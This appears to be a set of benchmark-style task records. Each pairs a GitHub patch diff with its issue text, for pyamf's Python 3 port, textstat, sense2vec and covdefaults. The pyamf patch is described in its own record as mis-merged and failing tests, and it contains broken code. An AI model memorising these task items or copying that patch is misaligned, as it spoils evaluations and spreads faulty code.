@@ -669,6 +669,8 @@ cdef class Encoder(codec.Encoder):
self.serialiseString(s)
cdef int writeInt(self, object n) except -1:
+ self.writeLong(n)
+ """
cdef long x = PyInt_AS_LONG(n)
if x < MIN_29B_INT or x > MAX_29B_INT:
@@ -676,6 +678,7 @@ cdef class Encoder(codec.Encoder):
self.writeType(TYPE_INTEGER)
_encode_integer(self.stream, x)
+ """
cdef int writeLong(self, object n) except -1:
cdef long x
@@ -718,7 +721,7 @@ cdef class Encoder(codec.Encoder):
_encode_integer(self.stream, (ref << 1) | REFERENCE_BIT)
- self.writeType('\x01')
+ self.writeType(b'\x01')
for i from 0 <= i < ref:
x = PyList_GET_ITEM(n, i)
@@ -727,6 +730,29 @@ cdef class Encoder(codec.Encoder):
return 0
+ cdef int writeSet(self, object n) except -1:
+ cdef Py_ssize_t ref = self.context.getObjectReference(n)
+ cdef Py_ssize_t i
+
+ self.writeType(TYPE_ARRAY)
+
+ if ref != -1:
+ return _encode_integer(self.stream, ref << 1)
+
+ self.context.addObject(n)
+
+ ref = PySet_GET_SIZE(n)
+
+ _encode_integer(self.stream, (ref << 1) | REFERENCE_BIT)
+ self.writeType(b'\x01')
+
+ set_iter = iter(n)
+ while True:
+ try:
+ self.writeElement(next(set_iter))
+ except StopIteration:
+ break
+
cdef int writeTuple(self, object n) except -1:
cdef Py_ssize_t ref = self.context.getObjectReference(n)
cdef Py_ssize_t i
@@ -742,7 +768,7 @@ cdef class Encoder(codec.Encoder):
ref = PyTuple_GET_SIZE(n)
_encode_integer(self.stream, (ref << 1) | REFERENCE_BIT)
- self.writeType('\x01')
+ self.writeType(b'\x01')
for i from 0 <= i < ref:
x = PyTuple_GET_ITEM(n, i)
@@ -782,7 +808,7 @@ cdef class Encoder(codec.Encoder):
if class_ref == 0:
self.stream.write(&REF_CHAR, 1)
- for key, value in obj.iteritems():
+ for key, value in obj.items():
if PyInt_Check(key) or PyLong_Check(key):
key = str(key)
@@ -966,11 +992,11 @@ cdef class Encoder(codec.Encoder):
self.context.addObject(obj)
- buf = str(obj)
- l = PyString_GET_SIZE(buf)
+ buf = bytes(obj)
+ l = PyBytes_GET_SIZE(buf)
_encode_integer(self.stream, (l << 1) | REFERENCE_BIT)
- self.stream.write(PyString_AS_STRING(buf), l)
+ self.stream.write(PyBytes_AS_STRING(buf), l)
return 0
@@ -986,15 +1012,15 @@ cdef class Encoder(codec.Encoder):
self.context.addObject(obj)
- s = xml.tostring(obj).encode('utf-8')
+ s = xml.tostring(obj) #.encode('utf-8')
- if not PyString_CheckExact(s):
- raise TypeError('Expected string from xml serialization')
+ if not PyBytes_CheckExact(s):
+ raise TypeError('Expected byte string from xml serialization')
- i = PyString_GET_SIZE(s)
+ i = PyBytes_GET_SIZE(s)
_encode_integer(self.stream, (i << 1) | REFERENCE_BIT)
- self.stream.write(PyString_AS_STRING(s), i)
+ self.stream.write(PyBytes_AS_STRING(s), i)
return 0
diff --git a/cpyamf/codec.pxd b/cpyamf/codec.pxd
index 57ff95a3..5f20b15f 100644
--- a/cpyamf/codec.pxd
+++ b/cpyamf/codec.pxd
@@ -60,8 +60,8 @@ cdef class Context(object):
cpdef Py_ssize_t getObjectReference(self, object obj) except -2
cpdef Py_ssize_t addObject(self, object obj) except -1
- cpdef unicode getStringForBytes(self, object s)
- cpdef str getBytesForString(self, object u)
+ cpdef str getStringForBytes(self, object s)
+ cpdef bytes getBytesForString(self, object u)
cdef class Codec(object):
@@ -117,6 +117,7 @@ cdef class Encoder(Codec):
cdef int writeDate(self, object o) except -1
cdef int writeXML(self, object o) except -1
cpdef int writeList(self, object o, bint is_proxy=?) except -1
+ cdef int writeSet(self, object o) except -1
cdef int writeTuple(self, object o) except -1
cdef int writeSequence(self, object iterable) except -1
cpdef int writeObject(self, object o, bint is_proxy=?) except -1
diff --git a/cpyamf/codec.pyx b/cpyamf/codec.pyx
index 8adabc35..c7cf5dc2 100644
--- a/cpyamf/codec.pyx
+++ b/cpyamf/codec.pyx
@@ -16,9 +16,6 @@ cdef extern from "datetime.h":
int PyDate_CheckExact(object)
int PyTime_CheckExact(object)
-cdef extern from "Python.h":
- bint PyClass_Check(object)
-
from cpyamf.util cimport cBufferedByteStream, BufferedByteStream
import types
@@ -274,7 +271,7 @@ cdef class Context(object):
try:
alias = pyamf.get_class_alias(klass)
except pyamf.UnknownClassAlias:
- if isinstance(klass, basestring):
+ if isinstance(klass, (bytes, unicode)):
raise
# no alias has been found yet .. check subclasses
@@ -286,7 +283,7 @@ cdef class Context(object):
return alias
- cpdef unicode getStringForBytes(self, object s):
+ cpdef str getStringForBytes(self, object s):
"""
Returns the corresponding unicode object for a given string. If there
is no unicode object, one is created.
@@ -298,14 +295,14 @@ cdef class Context(object):
if ret is not None:
return ret
- cdef unicode u = s.decode('utf-8')
+ cdef str u = s.decode('utf-8')
self.unicodes[s] = u
self._strings[u] = s
return u
- cpdef str getBytesForString(self, object u):
+ cpdef bytes getBytesForString(self, object u):
"""
Returns the corresponding utf-8 encoded string for a given unicode
object. If there is no string, one is encoded.
@@ -317,7 +314,7 @@ cdef class Context(object):
if ret is not None:
return ret
- cdef str s = u.encode('utf-8')
+ cdef bytes s = u.encode('utf-8')
self.unicodes[s] = u
self._strings[u] = s
@@ -518,6 +515,9 @@ cdef class Encoder(Codec):
cpdef int writeList(self, object o, bint is_proxy=0) except -1:
raise NotImplementedError
+ cdef int writeSet(self, object o) except -1:
+ raise NotImplementedError
+
cdef int writeTuple(self, object o) except -1:
raise NotImplementedError
@@ -525,11 +525,9 @@ cdef class Encoder(Codec):
raise NotImplementedError
cdef int writeGenerator(self, object o) except -1:
- cdef object n = getattr(o, 'next')
-
while True:
try:
- self.writeElement(n())
+ self.writeElement(next(o))
except StopIteration:
return 0
@@ -563,7 +561,7 @@ cdef class Encoder(Codec):
"""
cdef int ret = 1
- if PyString_Check(element):
+ if PyBytes_Check(element):
ret = self.writeBytes(element)
elif PyUnicode_Check(element):
ret = self.writeString(element)
@@ -571,8 +569,9 @@ cdef class Encoder(Codec):
ret = self.writeNull(element)
elif PyBool_Check(element):
ret = self.writeBoolean(element)
- elif PyInt_CheckExact(element):
- ret = self.writeInt(element)
+ # Int is Long
+ # elif PyInt_CheckExact(element):
+ # ret = self.writeInt(element)
elif PyLong_CheckExact(element):
ret = self.writeLong(element)
elif PyFloat_CheckExact(element):
@@ -581,6 +580,8 @@ cdef class Encoder(Codec):
ret = self.writeList(element)
elif PyTuple_CheckExact(element):
ret = self.writeTuple(element)
+ elif PyAnySet_CheckExact(element):
+ ret = self.writeSet(element)
elif element is Undefined:
ret = self.writeUndefined(element)
elif PyDict_CheckExact(element):
@@ -609,7 +610,9 @@ cdef class Encoder(Codec):
raise pyamf.EncodeError("Cannot encode functions %r" % (
element,
))
- elif PyClass_Check(element) or PyType_CheckExact(element):
+ # elif PyClass_Check(element) or PyType_CheckExact(element):
+ elif PyType_Check(element) or PyType_CheckExact(element):
+ # TODO: chek if this ^^^ is correct, or we need a different check
raise pyamf.EncodeError("Cannot encode class objects %r" % (
element,
))
@@ -678,7 +681,7 @@ cdef class Encoder(Codec):
self.stream.read(&buf, end_pos - start_pos)
- return PyString_FromStringAndSize(buf, end_pos - start_pos)
+ return PyBytes_FromStringAndSize(buf, end_pos - start_pos)
def __iter__(self):
return self
diff --git a/cpyamf/util.pyx b/cpyamf/util.pyx
index e75075f8..60450553 100644
--- a/cpyamf/util.pyx
+++ b/cpyamf/util.pyx
@@ -26,10 +26,10 @@ cdef extern from "Python.h":
from pyamf import python
# module constant declarations
-DEF ENDIAN_NETWORK = "!"
-DEF ENDIAN_NATIVE = "@"
-DEF ENDIAN_LITTLE = "<"
-DEF ENDIAN_BIG = ">"
+cdef char ENDIAN_NETWORK = b"!"
+cdef char ENDIAN_NATIVE = b"@"
+cdef char ENDIAN_LITTLE = b"<"
+cdef char ENDIAN_BIG = b">"
DEF MAX_BUFFER_EXTENSION = 1 << 14
@@ -37,9 +37,9 @@ cdef char SYSTEM_ENDIAN
cdef int float_broken = -1
-cdef unsigned char *NaN = <unsigned char *>'\xff\xf8\x00\x00\x00\x00\x00\x00'
-cdef unsigned char *NegInf = <unsigned char *>'\xff\xf0\x00\x00\x00\x00\x00\x00'
-cdef unsigned char *PosInf = <unsigned char *>'\x7f\xf0\x00\x00\x00\x00\x00\x00'
+cdef unsigned char *NaN = <unsigned char *>b'\xff\xf8\x00\x00\x00\x00\x00\x00'
+cdef unsigned char *NegInf = <unsigned char *>b'\xff\xf0\x00\x00\x00\x00\x00\x00'
+cdef unsigned char *PosInf = <unsigned char *>b'\x7f\xf0\x00\x00\x00\x00\x00\x00'
cdef double platform_nan
cdef double platform_posinf
@@ -365,7 +365,7 @@ cdef class cBufferedByteStream(object):
"""
Get raw data from buffer.
"""
- return PyString_FromStringAndSize(self.buffer, self.length)
+ return PyBytes_FromStringAndSize(self.buffer, self.length)
cdef Py_ssize_t peek(self, char **buf, Py_ssize_t size) except -1:
"""
@@ -741,12 +741,12 @@ cdef class cBufferedByteStream(object):
if PyUnicode_Check(obj) == 1:
encoded_string = PyUnicode_AsUTF8String(obj)
- elif PyString_Check(obj) == 1:
+ elif PyBytes_Check(obj) == 1:
encoded_string = obj
else:
raise TypeError('value must be Unicode or str')
- PyString_AsStringAndSize(encoded_string, &buf, &l)
+ PyBytes_AsStringAndSize(encoded_string, &buf, &l)
self.write(buf, l)
return 0
@@ -921,7 +921,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
elif isinstance(buf, cBufferedByteStream):
x = <cBufferedByteStream>buf
self.write(x.getvalue())
- elif isinstance(buf, (str, unicode)):
+ elif isinstance(buf, (bytes, str)):
self.write(buf)
elif hasattr(buf, 'getvalue'):
self.write(buf.getvalue())
@@ -937,16 +937,18 @@ cdef class BufferedByteStream(cBufferedByteStream):
property endian:
def __set__(self, value):
- if PyString_Check(value) == 0:
+ if PyBytes_Check(value) == 0:
raise TypeError('String value expected')
- if value not in [ENDIAN_NETWORK, ENDIAN_NATIVE, ENDIAN_LITTLE, ENDIAN_BIG]:
+ check_value = PyBytes_AsString(value)[0]
+
+ if check_value not in [ENDIAN_NETWORK, ENDIAN_NATIVE, ENDIAN_LITTLE, ENDIAN_BIG]:
raise ValueError('Not a valid endian type')
- self.endian = PyString_AsString(value)[0]
+ self.endian = check_value
def __get__(self):
- return PyString_FromStringAndSize(&self.endian, 1)
+ return PyBytes_FromStringAndSize(&self.endian, 1)
def read(self, size=-1):
"""
@@ -967,7 +969,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
cBufferedByteStream.read(self, &buf, s)
- return PyString_FromStringAndSize(buf, s)
+ return PyBytes_FromStringAndSize(buf, s)
def write(self, x, size=-1):
"""
@@ -1006,7 +1008,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
size = cBufferedByteStream.peek(self, &buf, size)
- return PyString_FromStringAndSize(buf, size)
+ return PyBytes_FromStringAndSize(buf, size)
def write_char(self, x):
"""
@@ -1016,7 +1018,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
@type x: C{int}
@raise TypeError: Unexpected type for int C{x}.
"""
- if PyInt_Check(x) == 0 and PyLong_Check(x) == 0:
+ if PyLong_Check(x) == 0:
raise TypeError('expected int for x')
cBufferedByteStream.write_char(self, <char>x)
@@ -1029,7 +1031,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
@type x: C{int}
@raise TypeError: Unexpected type for int C{x}.
"""
- if PyInt_Check(x) == 0 and PyLong_Check(x) == 0:
+ if PyLong_Check(x) == 0:
raise TypeError('expected int for x')
cBufferedByteStream.write_ushort(self, <unsigned short>x)
@@ -1042,7 +1044,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
@type x: C{int}
@raise TypeError: Unexpected type for int C{x}.
"""
- if PyInt_Check(x) == 0 and PyLong_Check(x) == 0:
+ if PyLong_Check(x) == 0:
raise TypeError('expected int for x')
cBufferedByteStream.write_short(self, <short>x)
@@ -1055,7 +1057,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
@type x: C{int}
@raise TypeError: Unexpected type for int C{x}.
"""
- if PyInt_Check(x) == 0 and PyLong_Check(x) == 0:
+ if PyLong_Check(x) == 0:
raise TypeError('expected int for x')
if x > 4294967295L or x < 0:
diff --git a/pyamf/amf3.py b/pyamf/amf3.py
index 63e0a32c..525f39f2 100644
--- a/pyamf/amf3.py
+++ b/pyamf/amf3.py
@@ -1004,7 +1004,7 @@ def _getClassDefinition(self, ref):
if class_def.attr_len > 0:
for i in range(class_def.attr_len):
- key = self.readBytes()
+ key = self.readString()
class_def.static_properties.append(key)
diff --git a/pyamf/codec.py b/pyamf/codec.py
index 0773588f..ce8c8b41 100644
--- a/pyamf/codec.py
+++ b/pyamf/codec.py
@@ -517,7 +517,7 @@ def getTypeFunc(self, data):
return self.writeNumber
elif t in python.int_types:
return self.writeNumber
- elif t in (list, tuple, frozenset):
+ elif t in (list, tuple, set, frozenset):
return self.writeList
elif t is types.GeneratorType: # flake8: noqa
return self.writeGenerator
diff --git a/pyamf/remoting/gateway/twisted.py b/pyamf/remoting/gateway/twisted.py
index 9771a648..56107be6 100644
--- a/pyamf/remoting/gateway/twisted.py
+++ b/pyamf/remoting/gateway/twisted.py
@@ -227,7 +227,7 @@ class TwistedGateway(gateway.BaseGateway, resource.Resource):
@type expose_request: C{bool}
"""
- allowedMethods = ('POST',)
+ allowedMethods = (b'POST',)
def __init__(self, *args, **kwargs):
if 'expose_request' not in kwargs:
@@ -282,7 +282,7 @@ def handleDecodeError(failure):
if self.debug:
body += "\n\nTraceback:\n\n%s" % failure.getTraceback()
- self._finaliseRequest(request, 400, body)
+ self._finaliseRequest(request, 400, body.encode())
request.content.seek(0, 0)
timezone_offset = self._get_timezone_offset()
@@ -332,7 +332,7 @@ def eb(failure):
if self.debug:
body += "\n\nTraceback:\n\n%s" % failure.getTraceback()
- self._finaliseRequest(request, 500, body)
+ self._finaliseRequest(request, 500, body.encode())
timezone_offset = self._get_timezone_offset()
d = threads.deferToThread(
@@ -399,9 +399,9 @@ def eb(failure):
"be successfully processed."
if self.debug:
- body += "\n\nTraceback:\n\n%s" % failure.getTraceback()
+ body += b"\n\nTraceback:\n\n%s" % failure.getTraceback()
- self._finaliseRequest(http_request, 500, body)
+ self._finaliseRequest(http_request, 500, body.encode())
d = defer.DeferredList(dl)
diff --git a/pyamf/util/pure.py b/pyamf/util/pure.py
index e648e5c6..1d9e02a1 100644
--- a/pyamf/util/pure.py
+++ b/pyamf/util/pure.py
@@ -188,7 +188,15 @@ class DataTypeMixIn(object):
#: Big endian
ENDIAN_BIG = ">"
- endian = ENDIAN_NETWORK
+ __endian = ENDIAN_NETWORK
+
+ @property
+ def endian(self):
+ return self.__endian
+
+ @endian.setter
+ def endian(self, value):
+ self.__endian = value.decode('utf-8') if isinstance(value, bytes) else value
def _read(self, length):
"""
diff --git a/setup.py b/setup.py
index 7a58dcab..c1fd30d6 100644
--- a/setup.py
+++ b/setup.py
@@ -29,6 +29,7 @@
Operating System :: OS Independent
Programming Language :: C
Programming Language :: Python
+Programming Language :: Cython
Programming Language :: Python :: 3.5
Programming Language :: Python :: 3.6
Programming Language :: Python :: 3.7
diff --git a/setupinfo.py b/setupinfo.py
index 9184086f..a36aa589 100644
--- a/setupinfo.py
+++ b/setupinfo.py
@@ -5,9 +5,10 @@
Meta data and helper functions for setup
"""
-import sys
-import os.path
import fnmatch
+import os.path
+import platform
+import sys
try:
from Cython.Distutils import build_ext
@@ -26,8 +27,7 @@
_version = None
-jython = sys.platform.startswith('java')
-can_compile_extensions = not jython
+can_compile_extensions = platform.python_implementation() == "CPython"
class MyDistribution(Distribution):
@@ -134,12 +134,11 @@ def get_version():
def get_extras_require():
return {
- 'wsgi': ['wsgiref'],
- 'twisted': ['Twisted>=2.5.0'],
+ 'twisted': ['Twisted>=16.0.0'],
'django': ['Django>=0.96'],
'sqlalchemy': ['SQLAlchemy>=0.4'],
'elixir': ['Elixir>=0.7.1'],
- 'lxml': ['lxml>=2.2'],
+ 'lxml': ['lxml>=4.4.0'],
'six': ['six>=1.10.0']
}
@@ -175,12 +174,9 @@ def get_install_requirements():
"""
install_requires = ['defusedxml']
- if sys.version_info < (2, 5):
- install_requires.extend(["elementtree>=1.2.6", "uuid>=1.30"])
-
if 'dev' in get_version():
if can_compile_extensions:
- install_requires.extend(['Cython>=0.13'])
+ install_requires.extend(['Cython>=0.28'])
return install_requires
@@ -191,9 +187,6 @@ def get_test_requirements():
"""
tests_require = []
- if sys.version_info < (2, 7):
- tests_require.extend(['unittest2'])
-
return tests_require
@@ -250,6 +243,7 @@ def get_extensions():
Return a list of Extension instances that can be compiled.
"""
if not can_compile_extensions:
+ # due to changes in pip these prints have no effect
print(80 * '*')
print('WARNING:')
print(
@@ -264,8 +258,6 @@ def get_extensions():
extensions = []
- # Hide Cython extension
- """
for p in recursive_glob('.', '*.pyx'):
mod_name = os.path.splitext(p)[0].replace(os.path.sep, '.')
@@ -273,7 +265,6 @@ def get_extensions():
if e:
extensions.append(e)
- """
return extensions
| Fix fetch header from a HTTPMessage
Support python3 by switching getheader() to get() to fetch a header value from a http.client.HTTPMessage
| Sorry. this PR was mis-merged.
This PR couldn't pass test case.
Please run "python3 setup.py test" before PR
```
======================================================================
ERROR: test_bad_response (pyamf.tests.remoting.test_client.GZipTestCase)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/Users/yohan/IdeaProjects/Py3AMF/pyamf/tests/remoting/test_client.py", line 663, in test_bad_response
self.assertRaises(IOError, self.gw._getResponse, None)
File "/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/unittest/case.py", line 727, in assertRaises
return context.handle('assertRaises', args, kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/unittest/case.py", line 176, in handle
callable_obj(*args, **kwargs)
File "/Users/yohan/IdeaProjects/Py3AMF/pyamf/remoting/client/__init__.py", line 458, in _getResponse
content_encoding = http_message.get('Content-Encoding')
AttributeError: 'MockHeaderCollection' object has no attribute 'get'
``` | 2022-11-19T21:47:21 | 0.0 | [] | [] |
||
textstat/textstat | textstat__textstat-198 | 0ed2dda9d1f68abbdf4109861fa18f7fa043930c | diff --git a/Pipfile b/Pipfile
index 7ba1b18..9a1a58b 100644
--- a/Pipfile
+++ b/Pipfile
@@ -6,6 +6,7 @@ name = "pypi"
[packages]
Pyphen = "*"
"repoze.lru" = "*"
+setuptools = "*"
[dev-packages]
codespell = "*"
diff --git a/requirements.txt b/requirements.txt
index 23a8e8d..3bda01d 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,1 +1,2 @@
Pyphen
+setuptools
diff --git a/setup.py b/setup.py
index 06b46d9..b305aef 100644
--- a/setup.py
+++ b/setup.py
@@ -4,24 +4,27 @@
setup(
name='textstat',
packages=['textstat'],
- version='0.7.3',
+ version='0.7.4',
description='Calculate statistical features from text',
author='Shivam Bansal, Chaitanya Aggarwal',
author_email='[email protected]',
- url='https://github.com/shivam5992/textstat',
+ url='https://github.com/textstat/textstat',
long_description=open('README.md', encoding='utf-8').read(),
long_description_content_type='text/markdown',
package_data={'': ['easy_word_list']},
include_package_data=True,
- install_requires=['pyphen'],
+ install_requires=['pyphen', 'setuptools'],
license='MIT',
python_requires=">=3.6",
classifiers=(
"Programming Language :: Python",
"Programming Language :: Python :: 3",
- "Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
+ "Programming Language :: Python :: 3.9",
+ "Programming Language :: Python :: 3.10",
+ "Programming Language :: Python :: 3.11",
+ "Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3 :: Only",
"Intended Audience :: Developers",
"Intended Audience :: Education",
| Python 3.12 compat fix
With Python 3.12 I get the following error.
```
File ~\AppData\Local\Programs\Python\Python312\Lib\site-packages\textstat\textstat.py:7
4 from collections import Counter
5 from typing import Union, List, Set
----> 7 import pkg_resources
8 from functools import lru_cache
9 from pyphen import Pyphen
ModuleNotFoundError: No module named 'pkg_resources'
```
I think this is due to the following change:
- [PEP 632](https://peps.python.org/pep-0632/)
- [gh-95299]https://docs.python.org/3/whatsnew/3.12.html#:~:text=%2C%20setuptools%2C-,pkg_resources,-%2C%20and%20easy_install%20will)
I have not tested the fix.
| 2024-01-09T14:39:39 | 0.0 | [] | [] |
|||
explosion/sense2vec | explosion__sense2vec-157 | eb53bf467ee1a02b333ca6f43afeb542fa58a49f | diff --git a/sense2vec/sense2vec.py b/sense2vec/sense2vec.py
index bb157f5..1e1cf8f 100644
--- a/sense2vec/sense2vec.py
+++ b/sense2vec/sense2vec.py
@@ -3,6 +3,7 @@
from spacy.vectors import Vectors
from spacy.strings import StringStore
from spacy.util import SimpleFrozenDict
+from thinc.api import NumpyOps
import numpy
import srsly
@@ -247,7 +248,11 @@ def get_other_senses(
result = []
key = key if isinstance(key, str) else self.strings[key]
word, orig_sense = self.split_key(key)
- versions = set([word, word.lower(), word.upper(), word.title()]) if ignore_case else [word]
+ versions = (
+ set([word, word.lower(), word.upper(), word.title()])
+ if ignore_case
+ else [word]
+ )
for text in versions:
for sense in self.senses:
new_key = self.make_key(text, sense)
@@ -270,7 +275,11 @@ def get_best_sense(
sense_options = senses or self.senses
if not sense_options:
return None
- versions = set([word, word.lower(), word.upper(), word.title()]) if ignore_case else [word]
+ versions = (
+ set([word, word.lower(), word.upper(), word.title()])
+ if ignore_case
+ else [word]
+ )
freqs = []
for text in versions:
for sense in sense_options:
@@ -304,6 +313,9 @@ def from_bytes(self, bytes_data: bytes, exclude: Sequence[str] = tuple()):
"""
data = srsly.msgpack_loads(bytes_data)
self.vectors = Vectors().from_bytes(data["vectors"])
+ # Pin vectors to the CPU so that we don't end up comparing
+ # numpy and cupy arrays.
+ self.vectors.to_ops(NumpyOps())
self.freqs = dict(data.get("freqs", []))
self.cfg.update(data.get("cfg", {}))
if "strings" not in exclude and "strings" in data:
@@ -340,6 +352,9 @@ def from_disk(self, path: Union[Path, str], exclude: Sequence[str] = tuple()):
freqs_path = path / "freqs.json"
cache_path = path / "cache"
self.vectors = Vectors().from_disk(path)
+ # Pin vectors to the CPU so that we don't end up comparing
+ # numpy and cupy arrays.
+ self.vectors.to_ops(NumpyOps())
self.cfg.update(srsly.read_json(path / "cfg"))
if freqs_path.exists():
self.freqs = dict(srsly.read_json(freqs_path))
| s2v standalone breaks if require_gpu() is called from spacy (cupy)
I am using spacy for NER, and later the S2V standalone on a smaller portion of the NER hits.
In the class that implements the NER model, there is a call to require_gpu to ensure transformer inference is fast. Attempting to use the s2v standalone in the same process afterwards results in an exception from cupy complaining about implicit conversion from the cupy tensor to a numpy array.
**Code snippet:**
```
import spacy
spacy.require_gpu()
import sense2vec
s2v = sense2vec.Sense2Vec().from_disk("s2v_reddit_2019_lg")
s2v.most_similar("Bart_Simpson|PERSON") #<-- exception raised here
```
**Traceback:**
```
TypeError Traceback (most recent call last)
Cell In[2], line 7
3 import sense2vec
5 s2v = sense2vec.Sense2Vec().from_disk("s2v_reddit_2019_lg")
----> 7 s2v.most_similar("Bart_Simpson|PERSON")
File [c:\Users\LPB\anaconda3\envs\sherlock\lib\site-packages\sense2vec\sense2vec.py:226](file:///C:/Users/LPB/anaconda3/envs/sherlock/lib/site-packages/sense2vec/sense2vec.py:226), in Sense2Vec.most_similar(self, keys, n, batch_size)
224 # Always ask for more because we'll always get the keys themselves
225 n = min(len(self.vectors), n + len(keys))
--> 226 rows = numpy.asarray(self.vectors.find(keys=keys))
227 vecs = self.vectors.data[rows]
228 average = vecs.mean(axis=0, keepdims=True)
File cupy\_core\core.pyx:1397, in cupy._core.core.ndarray.__array__()
TypeError: Implicit conversion to a NumPy array is not allowed. Please use `.get()` to construct a NumPy array explicitly.
```
**Versions:**
cupy-cuda112 10.6.0
sense2vec 2.0.1
spacy 3.4.3
spacy-alignments 0.8.6
spacy-transformers 1.1.8
| I'll note also that the problem doesn't occur if a sufficient cache is present, since there is no KNN calculation performed.
Thanks for the report, we'll take a look! | 2023-04-17T11:01:43 | 0.0 | [] | [] |
||
explosion/sense2vec | explosion__sense2vec-139 | 3c191aee178f4cbb0314b616622189c1d1c45876 | diff --git a/sense2vec/sense2vec.py b/sense2vec/sense2vec.py
index 9067ef6..bb157f5 100644
--- a/sense2vec/sense2vec.py
+++ b/sense2vec/sense2vec.py
@@ -247,7 +247,7 @@ def get_other_senses(
result = []
key = key if isinstance(key, str) else self.strings[key]
word, orig_sense = self.split_key(key)
- versions = [word, word.upper(), word.title()] if ignore_case else [word]
+ versions = set([word, word.lower(), word.upper(), word.title()]) if ignore_case else [word]
for text in versions:
for sense in self.senses:
new_key = self.make_key(text, sense)
@@ -270,7 +270,7 @@ def get_best_sense(
sense_options = senses or self.senses
if not sense_options:
return None
- versions = [word, word.upper(), word.title()] if ignore_case else [word]
+ versions = set([word, word.lower(), word.upper(), word.title()]) if ignore_case else [word]
freqs = []
for text in versions:
for sense in sense_options:
| ignore_case option for get_best_sense and get_other_senses does not check for lowercase
The `ignore_case` option for `get_base_sense` and `get_other_senses` claims that: "ignore_case (bool): Check for uppercase, lowercase and titlecase." However, `ignore_case` does not check for lowercase - it only checks for the version of the word passed in, upper-case, and title-case (https://github.com/explosion/sense2vec/blob/master/sense2vec/sense2vec.py#L250). It should also lower-case the word so that it correctly ignores case.
| 2021-06-07T21:03:32 | 0.0 | [] | [] |
|||
asottile/covdefaults | asottile__covdefaults-97 | 9d6e5c5c20108daa74b72783ced5452fa84678da | diff --git a/README.md b/README.md
index 08a0078..2761af0 100644
--- a/README.md
+++ b/README.md
@@ -67,7 +67,7 @@ exclude_lines =
^\s*raise$
# typing-related code
- ^if (False|TYPE_CHECKING):
+ ^\s*if (False|TYPE_CHECKING):
: \.\.\.(\s*#.*)?$
^ +\.\.\.$
-> ['"]?NoReturn['"]?:
diff --git a/covdefaults.py b/covdefaults.py
index 55a5120..09b40a9 100644
--- a/covdefaults.py
+++ b/covdefaults.py
@@ -93,7 +93,7 @@ def _version_pragmas(
r'^\s*return NotImplemented\b',
r'^\s*raise$',
# typing-related code
- r'^if (False|TYPE_CHECKING):',
+ r'^\s*if (False|TYPE_CHECKING):',
r': \.\.\.(\s*#.*)?$',
r'^ +\.\.\.$',
r'-> [\'"]?NoReturn[\'"]?:',
| Class-level `if TYPE_CHECKING` is reported as uncovered
Example:
```python
from typing import TYPE_CHECKING
class Some:
if TYPE_CHECKING:
some_attr: str
```
Here `if TYPE_CHECKING:` is reported to be uncovered.
<img width="679" alt="Снимок экрана 2022-12-03 в 14 21 00" src="https://user-images.githubusercontent.com/4660275/205438416-b995b5a3-a8a1-4553-ba20-b4246650c26b.png">
While, other rules have `\s*` prefix. I have a PR ready.
| 2022-12-03T11:28:41 | 0.0 | [] | [] |
|||
asottile/covdefaults | asottile__covdefaults-57 | b33cb96b0b06669148e156af0a4c0c343a97b859 | diff --git a/README.md b/README.md
index 281cd5a..4b25ec2 100644
--- a/README.md
+++ b/README.md
@@ -76,6 +76,13 @@ exclude_lines =
if __name__ == ['"]__main__['"]:$
# additional platform related pragmas (see below)
+ # additional version related pragmas (see below)
+partial_branches =
+ # a more strict default pragma
+ \# pragma: no cover\b
+
+ # our version pragmas
+ \# pragma: (>=?|<=?|==|!=)\d+\.\d+ cover\b'
```
### platform specific `# pragma: no cover`
@@ -123,6 +130,28 @@ note here that `# pragma: win32 cover` will become a "no cover" for everything
which is not `win32` -- whereas the `# pragma: win32 no cover` will be a
"no cover" only on `win32`.
+### version specific `# pragma: no cover`
+
+several `# pragma: no cover` tags will be added automatically based on the
+platform and implementation.
+
+these will be in the form of:
+
+```python
+# pragma: >=#.# cover
+```
+
+where the comparison operator is one of `>`, `>=`, `<`, `<=`, `==`, `!=`
+
+for example:
+
+```python
+if sys.version_info >= (3, 9): # pragma: >=3.9 cover
+ print('3.9+')
+else: # pragma: <3.9 cover
+ print('old')
+```
+
### overriding options
several of the options can be overridden / extended in your coverage
diff --git a/covdefaults.py b/covdefaults.py
index 981a9eb..cd863c5 100644
--- a/covdefaults.py
+++ b/covdefaults.py
@@ -27,6 +27,54 @@ def _plat_impl_pragmas() -> List[str]:
return ret
+def _lt(n: int) -> str:
+ n_s = str(n)
+ digit = r'\d'
+
+ parts = [
+ f'{n_s[:i]}[0-{int(n_s[i]) - 1}]{len(n_s[i + 1:]) * digit}'
+ for i in range(len(n_s))
+ if n_s[i] != '0'
+ ]
+ if len(n_s) > 1:
+ parts.append(f'{digit}{{1,{len(n_s) - 1}}}')
+
+ return f'({"|".join(parts)})'
+
+
+def _gt(n: int) -> str:
+ n_s = str(n)
+ digit = r'\d'
+
+ parts = [
+ f'{n_s[:i]}[{int(n_s[i]) + 1}-9]{len(n_s[i + 1:]) * digit}'
+ for i in range(len(n_s))
+ if n_s[i] != '9'
+ ]
+ parts.append(f'{digit}{{{len(n_s) + 1},}}')
+
+ return f'({"|".join(parts)})'
+
+
+def _version_pragmas(
+ major: int = sys.version_info[0],
+ minor: int = sys.version_info[1],
+) -> List[str]:
+ return [
+ # <
+ fr'# pragma: <=?{_lt(major)}\.\d+ cover\b',
+ fr'# pragma: <=?{major}\.{_lt(minor)} cover\b',
+ fr'# pragma: <{major}\.{minor} cover\b',
+ # >
+ fr'# pragma: >=?{_gt(major)}\.\d+ cover\b',
+ fr'# pragma: >=?{major}\.{_gt(minor)} cover\b',
+ fr'# pragma: >{major}\.{minor} cover\b',
+ # != / ==
+ fr'# pragma: !={major}\.{minor} cover\b',
+ fr'# pragma: ==(?!{major}\.{minor})\d+\.\d+ cover\b',
+ ]
+
+
OPTIONS: Tuple[Tuple[str, Any], ...] = (
('run:branch', True),
